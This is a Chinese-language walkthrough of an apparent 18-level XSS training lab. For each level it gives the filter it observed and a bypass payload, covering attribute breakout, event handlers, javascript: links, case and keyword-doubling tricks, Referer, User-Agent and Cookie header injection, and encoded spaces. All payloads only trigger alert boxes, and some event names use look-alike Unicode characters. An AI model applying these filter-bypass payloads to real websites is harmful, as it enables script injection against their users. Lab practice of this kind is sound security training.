第一关
输入js语句<script>alert(1)</script>
第二关
1、输入js语句<script>alert(1)</script>,发现没有完成跳转
2、查看源代码,发现被"包括在内,闭合两边"
3、输入 "><script>alert(1)</script><"
第三关
1、输入js语句<script>alert(1)</script>尝试
2、查看源代码,大小于号和双引号被转义,但是单引号没有被转义且参数是用单引号闭合的,尝试用事件触发的形式
输入' οnfοcus='alert(1)'尝试,成功绕过,但并无显示。直接点击输入框
第四关
1、输入js语句<script>alert(1)</script>尝试
2、查看源代码,大小于号(尖括号)已被过滤,引号没有被过滤或转义,参数采用的是双引号的闭合方式,尝试用事件触发的形式
3、使用点击js代码输入尝试 " οnfοcus='alert(123)'
第五关
1、尝试输入<script>alert(1)</script>查看
2、查看源代码,发现script和on开头的两个关键字都被转义,大小于号和引号没有被过滤与转义。同时语句采用双引号闭合方式
3、输入"><a href="javascript:alert(1)">click me!</a><"尝试
第六关
1、输入js语句尝试<script>alert(1)</script>
2、查看源代码,发现一些标签被过滤
3、使用大小写尝试绕过"><Script>alert(1)</Script><"
第七关
1、输入js语句尝试<script>alert(1)</script>
2、查看源代码,发现script被过滤
3、使用复写尝试绕过" oonnmouseover="alert(1)
第八关
1、输入js语句尝试<script>alert(1)</script>,页面没有变化
2、查看源代码,发现script被过滤,'被过滤
3、尝试使用href的伪协议 javascript:alert(1),因为script会被添加下划线,对script编码进行尝试
javascript:alert(1)
第九关
1、输入js语句尝试<script>alert(1)</script>,页面没有变化
2、查看源代码,发现与第九关过滤差不多,尝试用第九关代码尝试
解决参数不合法的问题。由于输入参数会赋给href,属于一个链接,因此猜测是否输入参数需要含http://才合法。输入参数为http://xxx.xxx
并提交,查看源码发现现在链接是合法的
3、输入javascript:alert('http://') javascriptalert('http://')
第十关
1、输入js语句尝试<script>alert(1)</script>,页面没有变化
2、查看源代码发现大小于号被转义、双引号都被转义
构造xss漏洞验证代码并验证。我们修改参数为?t_sort=click me!" type="button" onmouseover="alert(/xss/)
第十一关
1、输入js语句尝试<script>alert(1)</script>,页面没有变化
2、查看源代码,发现这有一个ref的变量可能是数据包里的referer ,
一共接收了三个参数,keyword与t_sort,被进行了html实体化的处理,所以尝试referer注入
3、使用BP抓包进行referer注入 referer:click me!" type="button" οnmοuseοver="alert(1)
第十二关
1、查看源代码,查看过滤规则,发现读取了user-agent的信息,因此,可以直接判定这里很可能存在着注入点
2、使用BP抓包,需修改ua头进行注入
第十三关
1、查看源代码,现这里的cookie确实是存在着一个变量user,尝试cookie头注入
2、使用BP抓包,,修改cookie头
click me!" type="button" οnmοuseοver="alert(1)
第十四关
1、打开页面发现是上传图片,上传一张图片查看
2、修改EXIF信息,向其中写入脚本,上传这张图片就是处罚xss
第十五关
1、查看源代码,发现注入点ng
2、输入<script>alert(1)</script>
3、输入?src='level1.php?name=<a type="text" href="javascript:alert(1)">',点击图片就会跳转到16关
第十六关
1、输入<img src=yuan οnerrοr=alert(1)>'查看页面源代码,发现空格进行了替换
2、查看源代码 ,发现空格确实被替换,使用以下%0a来代替空格字符 进行rul的编码绕过
keyword=<img%0asrc=yuan%0aοnerrοr=alert(1)>
第十七关
1、这一关主要考查的是Flash XSS。 因此这里,我们利用其特性与闭合回路的思想进行xss注入
level17.php?arg01=a&arg02=" οnmοuseοver=alert(1)
第十八关
1、与17关原理相同
level18.php?arg01=a&arg02=" οnmοuseοver=alert(1)